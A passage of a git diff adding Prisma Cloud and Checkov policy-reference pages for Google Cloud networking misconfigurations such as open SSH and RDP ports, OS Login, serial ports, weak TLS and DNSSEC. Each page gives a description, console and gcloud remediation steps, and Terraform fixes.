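# Illustrative only: assumes the Terraform Kubernetes provider is configured
# against a cluster whose authenticator_groups_config is already enabled.
resource "kubernetes_cluster_role_binding" "team_viewers" {
  metadata {
    name = "team-viewers"
  }

  role_ref {
    api_group = "rbac.authorization.k8s.io"
    kind      = "ClusterRole"
    name      = "view"
  }

  # The subject is a Google Group (nested under gke-security-groups@yourdomain.com),
  # so membership changes propagate without editing RBAC objects per user.
  subject {
    kind      = "Group"
    api_group = "rbac.authorization.k8s.io"
    name      = "team-viewers@yourdomain.com"
  }
}
----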
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_container_cluster +* *Arguments:* authenticator_groups_config.security_group + + +[source,go] +---- +{ + "resource "google_container_cluster" "example" { + name = var.name + location = var.location + project = data.google_project.project.name + ++ authenticator_groups_config{ ++ security_group="gke-security-groups@yourdomain.com" ++ }", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-1.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-1.adoc new file mode 100644 index 000000000..29d539ad4 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-1.adoc @@ -0,0 +1,104 @@ +== GCP Firewall rule allows all traffic on SSH port (22) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 49a154e8-6049-4317-bbb5-0c90cb078f94 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py[CKV_GCP_2] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Firewall rules setup fine-grained allow/deny traffic policies to and from a VM. +Enabled rules are always enforced, and help protect instances from unwanted traffic. +Firewall rules are defined at the network level, and only apply to the network where they are created. +Every VPC functions as a distributed firewall. +While firewall rules are defined at the network level, connections are allowed or denied on a per-instance basis. +A default network is pre-populated with firewall rules that allow incoming traffic to instances. +The *default-allow-ssh* rule permits ingress connections on TCP port 22 from any source to any instance in the network. 
+We recommend you restrict or remove the *default-allow-ssh* rule when you no longer need it. + +//// +=== Fix - Runtime + + +* Procedure* + + + +. List your firewall rules. ++ +You can view a list of all rules or just those in a particular network. + +. Click the rule * default-allow-ssh*. + +. Click * Delete*. + +. Click* Delete** again to confirm. + + +* CLI Command* + + +`gcloud compute firewall-rules delete default-allow-ssh` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_firewall +* *Arguments:* deny. + +The deny block supports: *protocol* (Required) The IP protocol to which this rule applies. +The protocol type is required when creating a firewall rule. +This value can either be one of the following well known protocol strings (tcp, udp, icmp, esp, ah, sctp, ipip), or the IP protocol number. +*ports* (Optional) An optional list of ports to which this rule applies. +This field is only applicable for UDP or TCP protocol. +Each entry must be either an integer or a range. +If not specified, this rule applies to connections through any port. +Example inputs include: ["22"], ["80","443"], and ["12345-12349"]. 
+
+
+[source,go]
+----
+resource "google_compute_firewall" "default" {
+  name    = "test-firewall"
+  network = google_compute_network.default.name
+
+  allow {
+    protocol = "icmp"
+  }
+
+  deny {
+    protocol = "tcp"
+    ports    = ["22"]
+  }
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-10.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-10.adoc
new file mode 100644
index 000000000..2c7fdf6bc
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-10.adoc
@@ -0,0 +1,123 @@
+== GCP Projects have OS Login disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 82dcb04d-0fae-4d38-9692-fc7dabc0e50c
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py[CKV_GCP_34]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Enabling OSLogin ensures that SSH keys used to connect to instances are mapped to IAM users.
+Revoking access for an IAM user revokes all the SSH keys associated with that user.
+It facilitates centralized and automated SSH key pair management.
+This is useful in handling cases such as responding to compromised SSH key pairs and/or revoking external/third-party/vendor users.
+We recommend you enable OSLogin to bind SSH certificates to IAM users and facilitate effective SSH certificate management.
+
+////
+=== Fix - Runtime
+
+
+* GCP Console To change the policy using the GCP Console, follow these steps:*
+
+
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. Navigate to https://console.cloud.google.com/compute/metadata [Metadata].
+
+. Click * Edit*.
+
+. 
Add a metadata entry where the key is * enable-oslogin* and the value is * TRUE*. + +. To apply changes, click * Save*. + +. For every instances that overrides the project setting, go to the * VM Instances* page at https://console.cloud.google.com/compute/instances. + +. Click the name of the instance on which you want to remove the metadata value. + +. To edit the instance settings go to the top of the instance details page and click * Edit*. + +. Under * Custom metadata*, remove any entry with key * enable-oslogin* and the value is * FALSE*. + +. To apply your changes to the instance, navigate to the bottom of the instance details page and click * Save*. + + +* CLI Command* + + + +. To configure oslogin on the project, use the following command: + +---- +gcloud compute project-info add-metadata --metadata enable-oslogin=TRUE +---- + +. To remove instance metadata that overrides the project setting, use the following command: + +---- +gcloud compute instances remove-metadata INSTANCE_NAME --keys=enable-oslogin +---- + +Optionally, you can enable two factor authentication for OS login. +For more information, see https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_project_metadata +* *Arguments:* enable-oslogin +* *Resource:* google_compute_instance +* *Arguments:* enable-oslogin Should not override project metadata: should not be set to false. 
+ + +[source,go] +---- +{ + "//Option 1 +resource "google_compute_project_metadata" "default" { + metadata = { ++ enable-oslogin = true + } + +} + +//Option 2 +resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" + boot_disk {} + metadata = { +- enable-oslogin = false + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-11.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-11.adoc new file mode 100644 index 000000000..2c09ed122 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-11.adoc @@ -0,0 +1,114 @@ +== GCP VM instances have serial port access enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a7e6ca7c-8b47-4556-9a34-d2ab88347b4b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py[CKV_GCP_35] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Interacting with a serial port is often referred to as the serial console. +It is similar to using a terminal window: input and output is entirely in text mode with no graphical interface or mouse support. +If the interactive serial console on an instance is enabled, clients can attempt to connect to that instance from any IP address. +For security purposes interactive serial console support should be disabled. +A virtual machine instance has four virtual serial ports. +Interacting with a serial port is similar to using a terminal window: input and output is entirely in text mode with no graphical interface or mouse support. 
+The instance's BIOS operating system and other system-level entities write output to the serial ports and accept input, for example, commands and responses to prompts. +Typically, these system-level entities use the first serial port (port 1). +Serial port 1 is often referred to as the serial console. +The interactive serial console does not support IP-based access restrictions, for example, an IP whitelist. +If you enable the interactive serial console on an instance, clients can connect to that instance from any IP address. +This allows anybody with the correct SSH key, username, project ID, zone, and instance name to connect to that instance. +To stop this type of access interactive serial console support should be disabled. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to * Computer Engine*. + +. Navigate to * VM instances*. + +. Select the specific VM. + +. Click * Edit*. + +. Clear the checkbox * Enable connecting to serial ports*, located below the * Remote access* block. + +. Click * Save*. + + +* CLI Command* + + +To disable an instance use one of the following commands: + +---- +gcloud compute instances add-metadata INSTANCE_NAME +--zone=ZONE +--metadata=serial-port-enable=false +---- + +OR + +---- +gcloud compute instances add-metadata INSTANCE_NAME +--zone=ZONE +--metadata=serial-port-enable=0 +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_instance +* *Arguments:* serial-port-enable By default set to false. 
+ + +[source,go] +---- +{ + "resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" + boot_disk {} + metadata = { +- serial-port-enable = true + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-12.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-12.adoc new file mode 100644 index 000000000..0e46109aa --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-12.adoc @@ -0,0 +1,96 @@ +== GCP VM instances have IP Forwarding enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bb3cb1ba-55f8-4c14-b299-777d7be79697 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py[CKV_GCP_36] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The Compute Engine instance cannot forward a packet unless the source IP address of the packet matches the IP address of the instance. +GCP will not deliver a packet with a destination IP address different to the IP address of the instance receiving the packet. +Both capabilities are required when using instances to help route packets. +To enable this source and destination IP check, disable the *canIpForward* field. +The *canIpForward* field allows an instance to send and receive packets with non-matching destination or source IPs. +We recommend the forwarding of data packets be disabled to prevent data loss and information disclosure. + +//// +=== Fix - Runtime + + +* GCP Console The canIpForward setting can only be edited at instance creation time.* + + +It is recommended to * delete* the instance and * create* a new one with canIpForward set to * False*. 
+To change the policy using the GCP Console, follow these steps: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/instances [VM instances]. + +. Select the * VM Instance* to remediate. + +. Click * Delete*. + +. On the * VM Instances* page, click * CREATE INSTANCE*. + +. Create a new instance with the desired configuration. ++ +NOTE: By default, a new instance is configured to not allow IP forwarding. + + + +* CLI Command* + + + +. To * delete* an instance, use the following command: `gcloud compute instances delete INSTANCE_NAME` + +. To * create* a new instance to replace it with * IP forwarding set to Off*, use the following command: `gcloud compute instances create` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_instance +* *Arguments:* can_ip_forward By default set to false. + + +[source,go] +---- +{ + "resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" +- can_ip_forward = true +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-2.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-2.adoc new file mode 100644 index 000000000..e8718d127 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-2.adoc @@ -0,0 +1,105 @@ +== GCP Firewall rule allows all traffic on RDP port (3389) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 34175634-0e4a-4e9d-9c77-0c75390b8bdc + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py[CKV_GCP_3] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== 
Description + + +Firewall rules set up fine-grained allow/deny traffic policies to and from a virtual machine (VM). +Enabled rules are always enforced, and help protect instances from unwanted traffic. +Firewall rules are defined at the network level, and only apply to the network where they are created. +Every VPC functions as a distributed firewall. +While firewall rules are defined at the network level, connections are allowed or denied on a per-instance basis. +A default network is pre-populated with firewall rules that allow incoming traffic to instances. +The *default-allow-rdp* rule permits ingress connections on TCP port 3389 from any source to any instance in the network. +We recommend you restrict or remove the *default-allow-rdp* rule when you no longer need it. + +//// +=== Fix - Runtime + + +*Procedure* + + + +. List your firewall rules. ++ +You can view a list of all rules or just those in a particular network. + +. Click the rule *default-allow-rdp* to delete it. + +. Click Delete. + +. Click Delete again to confirm. + + +*CLI Command* + + +`gcloud compute firewall-rules delete default-allow-rdp` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_firewall +* *Arguments:* deny + +The deny block supports: *protocol* (Required) The IP protocol to which this rule applies. +The protocol type is required when creating a firewall rule. +This value can either be one of the well-known protocol strings (tcp, udp, icmp, esp, ah, sctp, ipip), or the IP protocol number. +*ports* (Optional) An optional list of ports to which this rule applies. +This field is only applicable for the UDP or TCP protocols. +Each entry must be either an integer or a range. +If not specified, this rule applies to connections through any port. +Example inputs include: ["22"], ["80","443"], and ["12345-12349"].
+ + +[source,go] +---- +resource "google_compute_firewall" "default" { + name = "test-firewall" + network = google_compute_network.default.name + + allow { + protocol = "icmp" + } + + + deny { + protocol = "tcp" + ports = ["3389"] + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-3.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-3.adoc new file mode 100644 index 000000000..cf88e159c --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-3.adoc @@ -0,0 +1,156 @@ +== GCP HTTPS Load balancer is set with SSL policy having TLS version 1.1 or lower + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 513244c1-c014-4f65-9613-247db7c2932a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py[CKV_GCP_4] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Secure Sockets Layer (SSL) policies determine what Transport Layer Security (TLS) features clients are permitted to use when connecting to load balancers. +SSL policies control the features of SSL in Google Cloud SSL proxy load balancers and external HTTP(S) load balancers. +By default, HTTP(S) Load Balancing and SSL Proxy Load Balancing use a set of SSL features that provides good security and wide compatibility. +To prevent usage of insecure features, SSL policies should use one of the following three options: + +. At least TLS 1.2 with the MODERN profile; ++ +or + +. The RESTRICTED profile, because it effectively requires clients to use TLS 1.2 regardless of the chosen minimum TLS version; ++ +or + +. 
A CUSTOM profile that does not support any of the following features: ++ +* TLS_RSA_WITH_AES_128_GCM_SHA256 ++ +* TLS_RSA_WITH_AES_256_GCM_SHA384 ++ +* TLS_RSA_WITH_AES_128_CBC_SHA ++ +* TLS_RSA_WITH_AES_256_CBC_SHA ++ +* TLS_RSA_WITH_3DES_EDE_CBC_SHA ++ +Load balancers are used to efficiently distribute traffic across multiple servers. ++ +Both SSL proxy and HTTPS load balancers are external load balancers: they distribute traffic from the Internet to a GCP network. ++ +GCP customers can configure load balancer SSL policies with a minimum TLS version (1.0, 1.1, or 1.2) that clients can use to establish a connection, along with a profile (Compatible, Modern, Restricted, or Custom) that specifies permissible and insecure cipher suites. ++ +It is easy for customers to configure a load balancer without knowing they are permitting outdated cipher suites. ++ +It is possible to define SSL policies to control the features of SSL that your load balancer negotiates with clients. ++ +An SSL policy can be configured to determine the minimum TLS version and SSL features that are enabled in the load balancer. ++ +We recommend you select TLS 1.2 as the minimum TLS version supported. + +//// +=== Fix - Runtime + + +* GCP Console If the * TargetSSLProxy* or * TargetHttpsProxy* does not have an SSL policy configured, create a new SSL policy.* + + +Otherwise, modify the existing insecure policy. +To change the policy using the GCP Console, follow these steps: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/net-security/sslpolicies [SSL Policies]. + +. Click on the name of the insecure policy to go to its * SSL policy details* page. + +. Click * EDIT*. + +. Set * Minimum TLS version* to * TLS 1.2*. + +. Set * Profile* to * Modern* or * Restricted*. + +. 
Alternatively, if the user selects the profile * Custom*, make sure that the following features are disabled: ++ +* TLS_RSA_WITH_AES_128_GCM_SHA256 ++ +* TLS_RSA_WITH_AES_256_GCM_SHA384 ++ +* TLS_RSA_WITH_AES_128_CBC_SHA ++ +* TLS_RSA_WITH_AES_256_CBC_SHA ++ +* TLS_RSA_WITH_3DES_EDE_CBC_SHA + + +* CLI Command* + + + +. For each insecure SSL policy, update it to use secure cyphers: + +---- +gcloud compute ssl-policies update NAME +[--profile COMPATIBLE|MODERN|RESTRICTED|CUSTOM] +--min-tls-version 1.2 [--custom-features FEATURES] +---- + +. If the target proxy has a GCP default SSL policy, use the following command corresponding to the proxy type to update it: + +---- +gcloud compute target-ssl-proxies update TARGET_SSL_PROXY_NAME +--ssl-policy SSL_POLICY_NAME +gcloud compute target-https-proxies update TARGET_HTTPS_POLICY_NAME +--sslpolicy SSL_POLICY_NAME +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_ssl_policy +* *Arguments:* profile = MODERN +* *Resource:* google_compute_ssl_policy +* *Arguments:* profile = CUSTOM custom_features = [] + + +[source,go] +---- +//Option 1 +resource "google_compute_ssl_policy" "modern-profile" { + name = "nonprod-ssl-policy" ++ profile = "MODERN" ++ min_tls_version = "TLS_1_2" +} + +//Option 2 +resource "google_compute_ssl_policy" "custom-profile" { + name = "custom-ssl-policy" ++ profile = "CUSTOM" + min_tls_version = "TLS_1_2" ++ custom_features = ["TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384", "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"] +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-4.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-4.adoc new file mode 100644 index 000000000..1b0225520 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-4.adoc @@ -0,0 +1,132 @@ +== GCP SQL database is 
publicly accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b024e482-2425-4fa4-80b2-9c386879cea3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py[CKV_GCP_11] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Cloud SQL is a fully managed relational database service for MySQL, PostgreSQL, and SQL Server. +It offers data encryption at rest and in transit, private connectivity with VPC, and user-controlled network access with firewall protection. +It is possible to configure Cloud SQL to have a public IPv4 address. +This means your instance can accept connections from specific IP addresses, or a range of addresses, by adding authorized addresses to your instance. +We do not recommend this option. +We recommend you ensure Cloud SQL Database Instances are not publicly accessible, to help secure against attackers scanning the internet in search of public databases. + +//// +=== Fix - Runtime + + +*GCP Console* To change the policy using the GCP Console, follow these steps: + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to the Cloud SQL Instances page. + +. Click the instance name to open its Overview page. + +. Select the *Connections* tab. + +. Select the *Private IP* checkbox. + +. A drop-down list shows the available networks in your project. ++ +If your project is the service project of a Shared VPC, VPC networks from the host project are also shown. ++ +If you have configured private services access, select the VPC network you want to use. + +. A drop-down shows the IP address range you allocated. + +. Click *Connect*. + +. Click *Save*. ++ +To let Cloud SQL allocate an IP address for you: + +. Select the default VPC network. + +. Click *Allocate and connect*. + +. Click *Save*. 
+ + +*CLI Command* + + +VPC_NETWORK_NAME is the name of your chosen VPC network, for example: my-vpc-network. +The --network parameter value is in the format: https://www.googleapis.com/compute/alpha/projects/[PROJECT_ID]/global/networks/[VPC_NETWORK_NAME] + + +[source,shell] +---- +gcloud --project=[PROJECT_ID] beta sql instances patch [INSTANCE_ID] +--network=[VPC_NETWORK_NAME] +--no-assign-ip +---- + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_network
* *Arguments:* private_network (Optional) The VPC network from which the Cloud SQL instance is accessible for private IP. + +For example, projects/myProject/global/networks/default. +Specifying a network enables private IP. +Either ipv4_enabled must be enabled or a private_network must be configured. +This setting can be updated, but it cannot be removed after it is set. + + +[source,go] +---- +resource "google_compute_network" "private_network" { + provider = google-beta + + name = "private-network" +} + + +resource "google_compute_global_address" "private_ip_address" { + provider = google-beta + + name = "private-ip-address" + purpose = "VPC_PEERING" + address_type = "INTERNAL" + prefix_length = 16 + network = google_compute_network.private_network.id +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-5.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-5.adoc new file mode 100644 index 000000000..2920d5ac8 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-5.adoc @@ -0,0 +1,84 @@ +== GCP Cloud DNS has DNSSEC disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3fe0c24e-7e74-44b3-bbda-b3e68fb55f6c + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py[CKV_GCP_16] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +DNSSEC is a feature of the Domain Name System that authenticates responses to domain name lookups. +DNSSEC prevents attackers from manipulating or poisoning the responses to DNS requests. +We recommend you ensure DNSSEC is enabled in any public DNS zone, in the top-level domain registry, and in local DNS resolvers. + +NOTE: If *visibility* is set to *private*, then DNSSEC cannot be set, and this policy will pass. + + +//// +=== Fix - Runtime + + +*GCP Console* To change the policy using the GCP Console, follow these steps: + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Click the DNSSEC setting for the existing managed zone. + +. Select "On" in the pop-up menu. + +. In the confirmation dialog, click *Enable*. + + +*CLI Command* + + +You can enable DNSSEC for existing managed zones using the gcloud command line tool or the API: `gcloud dns managed-zones update EXAMPLE_ZONE --dnssec-state on` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_dns_managed_zone +* *Arguments:* dnssec_config (Optional) DNSSEC configuration. Structure is documented below. + + +[source,go] +---- +resource "google_dns_managed_zone" "example" { + description = "Company Domain name" + dns_name = "example.com." + + dnssec_config { # forces replacement + kind = "dns#managedZoneDnsSecConfig" # forces replacement + non_existence = "nsec3" # forces replacement + state = "on" # forces replacement + } +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-6.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-6.adoc new file mode 100644 index 000000000..a322cfb6e --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-6.adoc @@ -0,0 +1,68 @@ +== RSASHA1 is used for Zone-Signing and Key-Signing Keys in Cloud DNS DNSSEC + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| aecd368d-a818-4928-821f-2e7e991260d3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py[CKV_GCP_17] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +DNSSEC is a feature of the Domain Name System (DNS) that authenticates responses to domain name lookups. +There are several advanced DNSSEC configuration options you can use if DNSSEC is enabled for your managed zones. +These include unique signing algorithms, denial of existence, and the ability to use record types that require or recommend DNSSEC for their use. +When enabling DNSSEC for a managed zone, or creating a managed zone with DNSSEC, you can select the DNSSEC signing algorithms and the denial-of-existence type. +We do not recommend you use RSASHA1 unless you need it for compatibility reasons; +there is no security advantage to using it with larger key lengths. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_dns_managed_zone +* *Arguments:* *zone_signing_keys* - A list of Zone-signing key (ZSK) records. + +Structure is documented below. 
+*key_signing_keys* - A list of Key-signing key (KSK) records. +Structure is documented below. +Additionally, the DS record is provided. The *key_signing_keys* and *zone_signing_keys* blocks support: *algorithm* - a string mnemonic specifying the DNSSEC algorithm of this key. +Immutable after creation time. +Possible values are ecdsap256sha256, ecdsap384sha384, rsasha1, rsasha256, and rsasha512. + + +[source,go] +---- +resource "google_dns_managed_zone" "foo" { + name = "foobar" + dns_name = "foo.bar." + + zone_signing_keys { +- algorithm = "rsasha1" + } +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-7.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-7.adoc new file mode 100644 index 000000000..61f308565 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-7.adoc @@ -0,0 +1,96 @@ +== GCP Kubernetes Engine Clusters using the default network + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8212ac16-362c-4555-b182-76e9963434fb + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py[CKV_GCP_27] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The default network has a pre-configured network configuration and automatically generates the following insecure firewall rules: + +* *default-allow-internal*: Allows ingress connections for all protocols and ports among instances in the network. +* *default-allow-ssh*: Allows ingress connections on TCP port 22 (SSH) from any source to any instance in the network. +* *default-allow-rdp*: Allows ingress connections on TCP port 3389 (RDP) from any source to any instance in the network. 
+* *default-allow-icmp*: Allows ingress ICMP traffic from any source to any instance in the network. +These automatically created firewall rules do not get audit logged and cannot be configured to enable firewall rule logging. + +In addition, the default network is an auto mode network, which means that its subnets use the same predefined range of IP addresses. + +As a result, it is not possible to use Cloud VPN or VPC Network Peering with the default network. +We recommend that a project should not have a default network to prevent use of default network. +Based on organization security and networking requirements, the organization should create a new network and delete the default network. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/networking/networks/list [VPC networks]. + +. Click the network named * default*. + +. On the network detail page, click * EDIT*. + +. Click * DELETE VPC NETWORK*. + +. If needed, create a new network to replace the default network. + + +* CLI Command* + + +For each Google Cloud Platform project: + +. Delete the default network: `gcloud compute networks delete default` + +. 
If needed, create a new network to replace it: `gcloud compute networks create <network-name>` + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_project +* *Arguments:* auto_create_network + + +[source,go] +---- +resource "google_project" "my_project" { + name = "My Project" + project_id = "your-project-id" + org_id = "1234567" ++ auto_create_network = false +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-8.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-8.adoc new file mode 100644 index 000000000..4754bf78f --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-8.adoc @@ -0,0 +1,99 @@ +== GCP VM instances have block project-wide SSH keys feature disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 34acea4f-dacf-477d-9d96-3dcc9f29ed41 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py[CKV_GCP_32] + +|Severity +|HIGH + +|Subtype
+|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Project-wide SSH keys are stored in Compute Engine project metadata. +Project-wide SSH keys can be used to log in to all instances within a project. +Using project-wide SSH keys eases SSH key management. +If SSH keys are compromised, the potential security risk can impact all instances within a project. +We recommend you use instance-specific SSH keys instead of common/shared project-wide SSH key(s), to limit the attack surface should the SSH keys be compromised. + +//// +=== Fix - Runtime + + +*GCP Console* To change the policy using the GCP Console, follow these steps: + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. 
Navigate to https://console.cloud.google.com/compute/instances[VM instances]. + +. List all the instances in your project. + +. Click the name of the impacted instance. + +. Click *Edit* in the toolbar. + +. Under *SSH Keys*, navigate to *Block project-wide SSH keys*. + +. To block users with project-wide SSH keys from connecting to this instance, select *Block project-wide SSH keys*. + +. At the bottom of the page, click *Save*. ++ +Repeat these steps for each impacted instance. + + +*CLI Command* + + +To block project-wide public SSH keys, set the metadata value to TRUE using the following command: +---- +gcloud compute instances add-metadata INSTANCE_NAME +--metadata block-project-ssh-keys=TRUE +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_instance +* *Field:* metadata +* *Arguments:* block-project-ssh-keys + + +[source,go] +---- +resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" + metadata = { ++ block-project-ssh-keys = true + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-9.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-9.adoc new file mode 